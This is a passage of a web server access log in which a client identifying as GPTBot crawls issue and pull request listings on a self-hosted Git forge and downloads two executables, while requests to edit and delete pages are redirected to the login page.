"https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:56:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" +[17/Feb/2026:18:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/dist" +[17/Feb/2026:18:56:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" +[17/Feb/2026:18:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/dist" +[17/Feb/2026:18:56:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" +[17/Feb/2026:18:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/dist" +[17/Feb/2026:18:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 11057] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" +[17/Feb/2026:18:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 11058] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" +[17/Feb/2026:18:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9794] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 44981538] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:18:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:18:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 